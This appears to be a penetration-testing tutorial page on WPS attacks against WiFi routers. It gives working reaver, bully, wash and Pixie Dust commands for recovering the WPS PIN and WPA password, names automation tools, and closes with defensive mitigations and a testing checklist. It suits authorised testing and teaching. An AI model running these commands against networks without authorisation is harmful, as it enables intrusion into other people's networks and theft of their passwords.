WPS Attacks
WPS (WiFi Protected Setup) is the feature that lets you connect devices to WiFi by pressing a button or entering an 8-digit PIN, to avoid typing the long password. The problem: that PIN is a weak point that, badly implemented, lets you recover the network’s WPA password without cracking the handshake. It’s one of the most rewarding WiFi attacks when WPS is active, because it completely avoids offline key cracking.
Why WPS is weak
Section titled “Why WPS is weak”The 8-digit PIN isn’t validated as a whole: it’s checked in two halves (the first 4 digits and the next 3; the 8th is a checksum). That drastically reduces the search space: from 10^8 to ~11,000 attempts at most. And with Pixie Dust, often a single interaction suffices.
Discover APs with WPS
Section titled “Discover APs with WPS”wash -i wlan0mon # lists APs with WPS enabled, their state, and if "locked"# key columns: WPS version, WPS locked (if not locked, attackable)PIN bruteforce (Reaver / Bully)
Section titled “PIN bruteforce (Reaver / Bully)”# brute-force the PIN (by the two halves)reaver -i wlan0mon -b <BSSID> -c <channel> -vvbully -b <BSSID> -c <channel> wlan0mon# on recovering the PIN -> reaver also returns the WPA password (PSK)Slow if the AP isn’t misconfigured (can take hours, and some lock after several attempts: “WPS locked”).
Pixie Dust (the fast attack)
Section titled “Pixie Dust (the fast attack)”Pixie Dust exploits a weakness in how some APs generate the WPS exchange nonces: it lets you compute the PIN offline from a single transaction, in seconds/minutes instead of hours:
reaver -i wlan0mon -b <BSSID> -c <channel> -K 1 -vv # -K enables Pixie Dust# or bully with --pixiewps / airgeddon (WPS menu -> Pixie Dust)Many chipsets (Realtek, Ralink, old Broadcom) are vulnerable → PIN and password in minutes.
Null PIN and default PINs
Section titled “Null PIN and default PINs”# some APs accept an empty PIN or have default/BSSID-derivable PINs# databases of default PINs (by vendor/MAC)# airgeddon and wifite integrate these checksTools that automate it
Section titled “Tools that automate it”wifite2 # automates WPS (Pixie+bruteforce), WPA handshake, PMKID -> all-in-oneairgeddon # interactive menu with all WPS variantsreaver/bully + pixiewps # the low-level piecesFor the defense
Section titled “For the defense”- Disable WPS entirely on the router — the definitive mitigation, and almost always unnecessary.
- If you can’t, ensure it’s not vulnerable to Pixie Dust (patched firmware) and that it locks after failed attempts (WPS lock).
- Don’t use default PINs; prefer the button method (PBC) on demand only, not a permanent PIN.
- A strong WPA password doesn’t protect you if WPS is active and vulnerable: WPS hands it over directly.
Testing checklist
Section titled “Testing checklist”- Discover APs with WPS enabled (wash) and whether locked
- Pixie Dust first (reaver -K / pixiewps) — fast
- PIN bruteforce (reaver/bully) if Pixie fails
- Null PIN / default PINs by vendor
- Recover the WPA password from the PIN
- Automate with wifite2/airgeddon
- Blue: WPS disabled or patched + lock?
- Document that WPS hands over the key without cracking it